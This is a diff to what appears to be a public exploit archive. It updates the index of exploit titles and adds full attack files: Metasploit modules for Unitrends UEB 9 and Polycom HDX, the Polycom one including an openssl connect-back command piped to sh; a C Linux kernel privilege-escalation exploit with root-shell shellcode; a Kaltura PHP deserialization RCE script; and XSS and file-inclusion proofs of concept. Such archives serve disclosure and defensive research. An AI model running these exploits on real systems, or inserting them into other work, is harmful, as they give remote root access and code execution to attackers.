 43008,platforms/java/remote/43008.rb,"Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)",2017-10-17,Metasploit,java,remote,0
 43025,platforms/windows/remote/43025.py,"Ayukov NFTP FTP Client < 2.0 - Buffer Overflow",2017-10-21,"Berk Cem Göksel",windows,remote,0
 43030,platforms/lin_x86/remote/43030.rb,"Unitrends UEB 9 - http api/storage Remote Root (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,443
 43031,platforms/lin_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,1743
 43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -22417,7 +22423,7 @@ id,file,description,date,author,platform,type,port
 9889,platforms/php/webapps/9889.txt,"Joomla! Component Book Library 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0
 9890,platforms/php/webapps/9890.txt,"Joomla! Plugin JD-WordPress 2.0 RC2 - Remote File Inclusion",2009-10-19,"Don Tukulesto",php,webapps,0
 9891,platforms/php/webapps/9891.txt,"Joomla! Component Jshop - SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0
-9892,platforms/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0
+9892,platforms/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection",2009-10-23,kaMtiEz,php,webapps,0
 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8 - Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0
 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0
@ -30807,7 +30813,7 @@ id,file,description,date,author,platform,type,port
 28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - '/smumdadotcom_ascyb_alumni/mod.php?katalog Module query' Cross-Site Scripting",2006-10-23,MP,php,webapps,0
 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - 'mod.php?mod' Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0
 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0
-28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - dosetmytheme 'theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0
+28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - 'dosetmytheme?theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0
 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 - 'editzonetemplate?template' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0
 28845,platforms/php/webapps/28845.txt,"Shop-Script - Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0
 28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x - 'Waka.php' Multiple HTML Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0
@ -32055,7 +32061,7 @@ id,file,description,date,author,platform,type,port
 30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,php,webapps,0
 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0
 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - 'download.jsp?name' Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0
-30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0
+30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - 'Component/upload.jsp' Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0
 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - 'index.asp' SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0
 30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,php,webapps,0
 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - 'Page.asp' SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0
@ -38712,7 +38718,11 @@ id,file,description,date,author,platform,type,port
 43011,platforms/php/webapps/43011.txt,"Career Portal 1.0 - SQL Injection",2017-10-17,8bitsec,php,webapps,0
 43012,platforms/php/webapps/43012.txt,"Wordpress Plugin Car Park Booking - SQL Injection",2017-10-17,8bitsec,php,webapps,0
 43015,platforms/php/webapps/43015.txt,"Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities",2017-10-18,"SEC Consult",php,webapps,0
 43023,platforms/hardware/webapps/43023.txt,"TP-Link TL-MR3220 - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps,0
 43018,platforms/windows/webapps/43018.html,"ZKTime Web Software 2.0 - Cross-Site Request Forgery",2017-08-18,"Arvind V",windows,webapps,0
 43019,platforms/windows/webapps/43019.txt,"ZKTime Web Software 2.0 - Improper Access Restrictions",2017-08-18,"Arvind V",windows,webapps,0
 43021,platforms/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",python,webapps,0
 43022,platforms/hardware/webapps/43022.py,"TP-Link WR940N - Authenticated Remote Code Exploit",2017-10-17,"Fidus InfoSecurity",hardware,webapps,0
 43024,platforms/multiple/webapps/43024.txt,"Logitech Media Server - Cross-Site Scripting",2017-10-14,"Thiago Sena",multiple,webapps,0
 43027,platforms/php/webapps/43027.txt,"CometChat < 6.2.0 BETA 1 - Local File Inclusion",2017-10-22,Paradoxis,php,webapps,0
 43028,platforms/php/webapps/43028.py,"Kaltura < 13.1.0 - Remote Code Execution",2017-10-23,"Robin Verton",php,webapps,0
--- a/platforms/hardware/webapps/43023.txt
+++ b/platforms/hardware/webapps/43023.txt
@ -0,0 +1,25 @@
 # Exploit Title: Vulnerability Xss - TP-LINK TL-MR3220
 # Date: 12/10/2017
 # Exploit Author: Thiago "THX" Sena
 # Vendor Homepage: http://www.tp-link.com.br
 # Version: TL-MR3220
 # Tested on: Windows 10
 # CVE : CVE-2017-15291
 Vulnerabilty: Cross-site scripting (XSS) in TP-LINK TL-MR3220
 cve: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15291
 ---------------------------------------------------------------
 PoC: 
 0x01 - First you go to ( http://IP:PORT/ )
 0x02 - In the 'Wireless MAC Filtering' tab. 
 0x03 - Will add a new MAC Address.
 0x04 - In 'Description' it will put the script ( <script>alert('XSS')</script> ) and complete the registration. 
 0x05 - Xss Vulnerability
 --------------------------------------------------------------
--- a/platforms/lin_x86/remote/43030.rb
+++ b/platforms/lin_x86/remote/43030.rb
@ -0,0 +1,93 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Unitrends UEB 9 http api/storage remote root',
      'Description'    => %q{
        It was discovered that the api/storage web interface in Unitrends Backup (UB)
        before 10.0.0 has an issue in which one of its input parameters was not validated.
        A remote attacker could use this flaw to bypass authentication and execute arbitrary
        commands with root privilege on the target system.
      },
      'Author'         =>
        [
          'Cale Smith',    # @0xC413
          'Benny Husted', # @BennyHusted
          'Jared Arave'   # @iotennui
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch' => [ARCH_X86],
      'CmdStagerFlavor' => [ 'printf' ],
      'References'     =>
        [
          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
          ['CVE', '2017-12478'],
        ],
      'Targets'        =>
        [
          [ 'UEB 9.*', { } ]
        ],
      'Privileged'     => true,
      'DefaultOptions' => {
          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
          'SSL' => true
        },
      'DisclosureDate'  => 'Aug 8 2017',
      'DefaultTarget'   => 0))
    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true])
      ])
    deregister_options('SRVHOST', 'SRVPORT')
  end
  #substitue some charactes
  def filter_bad_chars(cmd)
    cmd.gsub!("\\", "\\\\\\")
    cmd.gsub!("'", '\\"')
  end
  def execute_command(cmd, opts = {})
    session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0"  #SQLi auth bypass
    session = Base64.strict_encode64(session) #b64 encode session token
    #substitue the cmd into the hostname parameter
    parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
    parms << filter_bad_chars(cmd)
    parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
    res = send_request_cgi({
      'uri' => '/api/storage',
      'method' => 'POST',
      'ctype'  => 'application/json',
      'encode_params' => false,
      'data'   => parms,
      'headers' =>
        {'AuthToken' => session}
    })
    if res && res.code != 500
      fail_with(Failure::UnexpectedReply,'Unexpected response')
    end
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
  end
  def exploit
    print_status("#{peer} - pwn'ng ueb 9....")
    execute_cmdstager(:linemax => 120)
  end
 end
--- a/platforms/lin_x86/remote/43031.rb
+++ b/platforms/lin_x86/remote/43031.rb
@ -0,0 +1,119 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Unitrends UEB bpserverd authentication bypass RCE',
      'Description'    => %q{
       It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
       has an issue in which its authentication can be bypassed.  A remote attacker could use this
       issue to execute arbitrary commands with root privilege on the target system.
      },
      'Author'         =>
        [
          'Jared Arave',  # @iotennui
          'Cale Smith',   # @0xC413
          'Benny Husted'  # @BennyHusted
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch' => [ARCH_X86],
      'CmdStagerFlavor' => [ 'printf' ],
      'References'     =>
        [
          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'],
          ['CVE', '2017-12477'],
        ],
      'Targets'        =>
        [
          [ 'UEB 9.*', { } ]
        ],
      'Privileged'     => true,
      'DefaultOptions' => {
          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
          'SSL' => false
        },
      'DisclosureDate'  => 'Aug 8 2017',
      'DefaultTarget'   => 0))
    register_options([
        Opt::RPORT(1743)
      ])
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end
  def check
    s1 = connect(global = false)
    buf1  = s1.get_once(-1).to_s
    #parse out the bpd port returned
    bpd_port = buf1[-8..-3].to_i
    #check if it's a valid port number (1-65534)
    if bpd_port && bpd_port >= 1 && bpd_port <= 65535
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end
  def execute_command(cmd, opts = {})
    #append a comment, ignore everything after our cmd
    cmd = cmd + " #"
    # build the attack buffer...
    command_len = cmd.length + 3
    packet_len = cmd.length + 23
    data =  "\xa5\x52\x00\x2d"
    data << "\x00\x00\x00"
    data << packet_len
    data << "\x00\x00\x00"
    data << "\x01"
    data << "\x00\x00\x00"
    data << "\x4c"
    data << "\x00\x00\x00"
    data << command_len
    data << cmd
    data << "\x00\x00\x00"
    begin
      print_status("Connecting to xinetd for bpd port...")
      s1 = connect(global = false)
      buf1  = s1.get_once(-1).to_s
      #parse out the bpd port returned, we will connect back on this port to send our cmd
      bpd_port = buf1[-8..-3].to_i
      print_good("bpd port recieved: #{bpd_port}")
      vprint_status("Connecting to #{bpd_port}")
      s2 = connect(global = false, opts = {'RPORT'=>bpd_port})
      vprint_good('Connected!')
      print_status('Sending command buffer to xinetd')
      s1.put(data)
      s2.get_once(-1,1).to_s
      disconnect(s1)
      disconnect(s2)
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
      fail_with(Failure::Unreachable, "#{peer} - Connection to server failed")
    end
  end
  def exploit
    print_status("#{peer} - pwn'ng ueb 9....")
    execute_cmdstager(:linemax => 200)
  end
 end
--- a/platforms/linux/local/43029.c
+++ b/platforms/linux/local/43029.c
@ -0,0 +1,127 @@
 #define _GNU_SOURCE
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <sys/types.h>
 #include <sys/wait.h>
 #include <sys/mman.h>
 #include <string.h>
 struct cred;
 struct task_struct;
 typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
 typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
 prepare_kernel_cred_t   prepare_kernel_cred;
 commit_creds_t    commit_creds;
 void get_shell() {
  char *argv[] = {"/bin/sh", NULL};
  if (getuid() == 0){
    printf("[+] Root shell success !! :)\n");
    execve("/bin/sh", argv, NULL);
  }
  printf("[-] failed to get root shell :(\n");
 }
 void get_root() {
  if (commit_creds && prepare_kernel_cred)
    commit_creds(prepare_kernel_cred(0));
 }
 unsigned long get_kernel_sym(char *name)
 {
  FILE *f;
  unsigned long addr;
  char dummy;
  char sname[256];
  int ret = 0;
  f = fopen("/proc/kallsyms", "r");
  if (f == NULL) {
    printf("[-] Failed to open /proc/kallsyms\n");
    exit(-1);
  }
  printf("[+] Find %s...\n", name);
  while(ret != EOF) {
    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
    if (ret == 0) {
      fscanf(f, "%s\n", sname);
      continue;
    }
    if (!strcmp(name, sname)) {
      fclose(f);
      printf("[+] Found %s at %lx\n", name, addr);
      return addr;
    }
  }
  fclose(f);
  return 0;
 }
 int main(int ac, char **av)
 {
 	if (ac != 2) {
 		printf("./exploit kernel_offset\n");
 		printf("exemple = 0xffffffff81f3f45a");
 		return EXIT_FAILURE;
 	}
 	// 2 - Appel de la fonction get_kernel_sym pour rcuperer dans le /proc/kallsyms les adresses des fonctions
 	prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
 	commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
 	// have_canfork_callback offset <= rendre dynamique aussi
 	pid_t     pid;
 	/* siginfo_t info; */
 	// 1 - Mapper la mmoire  l'adresse 0x0000000000000000
 	printf("[+] Try to allocat 0x00000000...\n");
 	if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){
 		printf("[-] Failed to allocat 0x00000000\n");
 		return -1;
 	}
 	printf("[+] Allocation success !\n");
 	/* memset(0, 0xcc, 4096); */
 /*
 movq rax, 0xffffffff81f3f45a
 movq [rax], 0
 mov rax, 0x4242424242424242
 call rax
 xor rax, rax
 ret
 replace 0x4242424242424242 by get_root
 https://defuse.ca/online-x86-assembler.htm#disassembly
 	 */
 	unsigned char shellcode[] = 
 	{ 0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, 0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };
 	void **get_root_offset = rawmemchr(shellcode, 0x42);
 	(*get_root_offset) = get_root;
 	memcpy(0, shellcode, sizeof(shellcode));
 	/* strcpy(0, "\x48\x31\xC0\xC3"); // xor rax, rax; ret */
 	if(-1 == (pid = fork())) {
 		perror("fork()");
 		return EXIT_FAILURE;
 	}
 	if(pid == 0) {
 		_exit(0xDEADBEEF);
 		perror("son");
 		return EXIT_FAILURE;
 	}
 	siginfo_t *ptr = (siginfo_t*)strtoul(av[1], (char**)0, 0);
 	waitid(P_PID, pid, ptr, WEXITED | WSTOPPED | WCONTINUED);
 // TRIGGER
 	pid = fork();
 	printf("fork_ret = %d\n", pid);	
 	if (pid > 0)
 		get_shell();
 	return EXIT_SUCCESS;
 }
--- a/platforms/multiple/webapps/43024.txt
+++ b/platforms/multiple/webapps/43024.txt
@ -0,0 +1,43 @@
 # Exploit Title: DOM Based Cross Site Scripting (XSS) - Logitech Media Server
 # Shodan Dork: Logitech Media Server 
 # Date: 14/10/2017
 # Exploit Author: Thiago "THX" Sena
 # Vendor Homepage: https://www.logitech.com
 # Tested on: windows 10
 # CVE : CVE-2017-15687
 -----------------------------------------------
 PoC:
 - First you go to ( http://IP:PORT/ )
 - Then put the script ( <BODY ONLOAD=alert(document.cookie)> )
 - ( http://IP:PORT/<BODY ONLOAD=alert(document.cookie)> )
 - Xss Vulnerability
 ---------------------------------------------------
 [Versões Afetadas]
 7.7.3
 7.7.5
 7.9.1
 7.7.2
 7.7.1
 7.7.6
 7.9.0
 [Request]
 GET /%3Cbody%20onload=alert('Xss')%3E HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: Squeezebox-expandPlayerControl=true; Squeezebox-expanded-MY_MUSIC=0; Squeezebox-expanded-RADIO=0; Squeezebox-expanded-PLUGIN_MY_APPS_MODULE_NAME=0; Squeezebox-expanded-FAVORITES=0; Squeezebox-expanded-PLUGINS=0
 Connection: close
 Upgrade-Insecure-Requests: 1
--- a/platforms/php/webapps/43027.txt
+++ b/platforms/php/webapps/43027.txt
@ -0,0 +1,60 @@
 # Exploit Title: CometChat < v6.2.0 BETA 1 - Local File Inclusion
 # Date: 2017-10-22
 # Exploit Author: Luke Paris (Paradoxis) <luke@paradoxis.nl>
 # Vendor Homepage: https://cometchat.com/
 # Version: < 6.2.0 BETA 1
 # Tested on: Ubuntu Linux 14.04
 #
 # --------------------------------------------------------------------------------------
 #
 # In versions of CometChat before version v6.2.0 BETA 1 a bug existed which allowed
 # any unauthorised attacker to modify the include path of a php file by sending an
 # HTTP request with a crafted 'cc_lang' cookie.
 #
 # If successfully exploited an attacker could leverage this bug to execute arbitrary PHP
 # code which resides somewhere else on the server (eg: uploaded via an upload form).
 #
 # Due to the fact that this bug resides in the configuration file of the applications
 # it might be possible that future versions of the chat application still contain the
 # file inclusion bug as the script might have been re-applied after an update.
 #
 # --------------------------------------------------------------------------------------
 #
 # The vulnerability resides in the application's configuration file, near the beginning 
 # of the script the following code block is executed, this is where an attacker is able 
 # to inject a string into the cc_lang cookie.
 /* COOKIE */
 $cookiePrefix = 'cc_';
 /* LANGUAGE START */
 $lang = 'en';
 /* LANGUAGE END */ 
 if (!empty($_COOKIE[$cookiePrefix."lang"])) {
    $lang = $_COOKIE[$cookiePrefix."lang"];
 }
 # Near the end of the configuration file, the following code block is executed.
 # This is where the exploit is triggered by not sanitising the $lang variable properly.
 include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.'en.php';
 if (file_exists(dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php')) {
    include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php';          
 }
 # The following example demonstrates how an attacker could leverage this bug to gain control 
 # over the server, which could result in a full server compromise (assuming the attacker has
 # already managed to write a webshell to the servers' disk somehow): 
 GET /cometchat/config.php?cmd=id HTTP/1.1
 Host: example.com
 Connection: keep-alive
 Cookie: cc_lang=../../uploads/evil
 HTTP/1.1 200 OK
 Host: example.com
 Connection: close
 Content-type: text/html; charset=UTF-8
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
--- a/platforms/php/webapps/43028.py
+++ b/platforms/php/webapps/43028.py
@ -0,0 +1,59 @@
 #!/usr/bin/env python
 # Kaltura <= 13.1.0 RCE (CVE-2017-14143)
 # https://telekomsecurity.github.io/2017/09/kaltura-rce.html
 # 
 # $ python kaltura_rce.py "https://example.com" 0_xxxxxxxx "system('id')"
 # [~] host: https://example.com
 # [~] entry_id: 0_xxxxxxxx
 # [~] code: system('id')
 # [+] sending request..
 # uid=1003(wwwrun) gid=50004(www) groups=50004(www),7373(kaltura)
 import urllib
 import urllib2
 import base64
 import md5
 import sys
 cookie_secret = 'y3tAno3therS$cr3T';
 def exploit(host, entry_id, php_code):
    print("[+] Sending request..")
    url = "{}/index.php/keditorservices/getAllEntries?list_type=15&entry_id={}".format(host, entry_id)
    cmd = "{}.die();".format(php_code)
    cmd_len = len(cmd)
    payload = "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\0*\0_writers\";a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\0*\0_eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0_layoutEventsToMail\";a:0:{}s:8:\"\0*\0_mail\";O:9:\"Zend_Mail\":0:{}s:10:\"\0*\0_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\0*\0_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\0*\0_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0_replacement\";s:%s:\"%s\";}s:20:\"\0*\0_inflectorEnabled\";b:1;s:10:\"\0*\0_layout\";s:6:\"layout\";}s:22:\"\0*\0_subjectPrependText\";N;}}};}"
    exploit_code = payload % (len(cmd), cmd)
    encoded = base64.b64encode(exploit_code)
    md5_hash = md5.new("%s%s" % (encoded, cookie_secret)).hexdigest()
    cookies={'userzone': "%s%s" % (encoded, md5_hash)}
    r = urllib2.Request(url)
    r.add_header('Cookie', urllib.urlencode(cookies))
    req = urllib2.urlopen(r)
    return req.read()
 if __name__ == '__main__':
    if len(sys.argv) < 4:
        print("Usage: %s <host> <entry_id> <php_code>" % sys.argv[0])
        print(" example: %s http://example.com 0_abc1234 system('id')" % sys.argv[0])
        sys.exit(0)
    host = sys.argv[1]
    entry_id = sys.argv[2]
    cmd = sys.argv[3]
    print("[~] host: %s" % host)
    print("[~] entry_id: %s" % entry_id)
    print("[~] php_code: %s" % cmd)
    result = exploit(sys.argv[1], sys.argv[2], sys.argv[3])
    print(result)
--- a/platforms/unix/remote/43032.rb
+++ b/platforms/unix/remote/43032.rb
@ -0,0 +1,246 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'            => 'Polycom Command Shell Authorization Bypass',
        'Alias'           => 'polycom_hdx_auth_bypass',
        'Author'          =>
          [
            'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module
            'h00die <mike@shorebreaksecurity.com>',         # submission/cleanup
          ],
        'DisclosureDate'  => 'Jan 18 2013',
        'Description'     => %q(
          The login component of the Polycom Command Shell on Polycom HDX
          video endpoints, running software versions 3.0.5 and earlier,
          is vulnerable to an authorization bypass when simultaneous
          connections are made to the service, allowing remote network
          attackers to gain access to a sandboxed telnet prompt without
          authentication. Versions prior to 3.0.4 contain OS command
          injection in the ping command which can be used to execute
          arbitrary commands as root.
          ),
        'License'         => MSF_LICENSE,
        'References'      =>
          [
            [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
            [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],
            [ 'EDB', '24494']
          ],
        'Platform'    => 'unix',
        'Arch'        => ARCH_CMD,
        'Privileged'  => true,
        'Targets'     => [ [ "Universal", {} ] ],
        'Payload'     =>
        {
          'Space'        => 8000,
          'DisableNops'  => true,
          'Compat'       => { 'PayloadType' => 'cmd' }
        },
        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },
        'DefaultTarget'  => 0
      )
    )
    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(23),
        OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
        OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
      ], self.class
    )
    register_advanced_options(
      [
        OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
        OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
      ], self.class
    )
  end
  def check
    connect
    sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
    Rex.sleep(1)
    res = sock.get_once
    disconnect
    if !res && !res.empty?
      return Exploit::CheckCode::Safe
    end
    if res =~ /Welcome to ViewStation/
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end
  def exploit
    # Keep track of results (successful connections)
    results = []
    # Random string for password
    password = Rex::Text.rand_text_alpha(rand(5) + 1)
    # Threaded login checker
    max_threads = datastore['THREADS']
    cur_threads = []
    # Try up to 100 times just to be sure
    queue = [*(1..datastore['MAX_CONNECTIONS'])]
    print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ")
    until queue.empty?
      while cur_threads.length < max_threads
        # We can stop if we get a valid login
        break unless results.empty?
        # keep track of how many attempts we've made
        item = queue.shift
        # We can stop if we reach max tries
        break unless item
        t = Thread.new(item) do |count|
          sock = connect
          sock.put(password + "\n")
          res = sock.get_once
          until res.empty?
            break unless results.empty?
            # Post-login Polycom banner means success
            if res =~ /Polycom/
              results << sock
              break
            # bind error indicates bypass is working
            elsif res =~ /bind/
              sock.put(password + "\n")
            # Login error means we need to disconnect
            elsif res =~ /failed/
              break
            # To many connections means we need to disconnect
            elsif res =~ /Error/
              break
            end
            res = sock.get_once
          end
        end
        cur_threads << t
      end
      # We can stop if we get a valid login
      break unless results.empty?
      # Add to a list of dead threads if we're finished
      cur_threads.each_index do |ti|
        t = cur_threads[ti]
        unless t.alive?
          cur_threads[ti] = nil
        end
      end
      # Remove any dead threads from the set
      cur_threads.delete(nil)
      Rex.sleep(0.25)
    end
    # Clean up any remaining threads
    cur_threads.each { |sock| sock.kill }
    if !results.empty?
      print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
      do_payload(results[0])
    else
      print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
    end
  end
  def do_payload(sock)
    # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
    cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
    # Start a listener
    start_listener(true)
    # Figure out the port we picked
    cbport = self.service.getsockname[2]
    # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
    cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
    sock.put(cmd)
    # Give time for our command to be queued and executed
    1.upto(5) do
      Rex.sleep(1)
      break if session_created?
    end
  end
  def stage_final_payload(cli)
    print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
    cli.put(payload.encoded + "\n")
  end
  def start_listener(ssl = false)
    comm = datastore['ListenerComm']
    if comm == 'local'
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end
    self.service = Rex::Socket::TcpServer.create(
      'LocalPort' => datastore['CBPORT'],
      'SSL'       => ssl,
      'SSLCert'   => datastore['SSLCert'],
      'Comm'      => comm,
      'Context'   =>
      {
        'Msf'        => framework,
        'MsfExploit' => self
      }
    )
    self.service.on_client_connect_proc = proc { |client|
      stage_final_payload(client)
    }
    # Start the listening service
    self.service.start
  end
  # Shut down any running services
  def cleanup
    super
    if self.service
      print_status("Shutting down payload stager listener...")
      begin
        self.service.deref if self.service.is_a?(Rex::Service)
        if self.service.is_a?(Rex::Socket)
          self.service.close
          self.service.stop
        end
        self.service = nil
      rescue ::Exception
      end
    end
  end
  # Accessor for our TCP payload stager
  attr_accessor :service
 end
--- a/platforms/windows/dos/43026.py
+++ b/platforms/windows/dos/43026.py
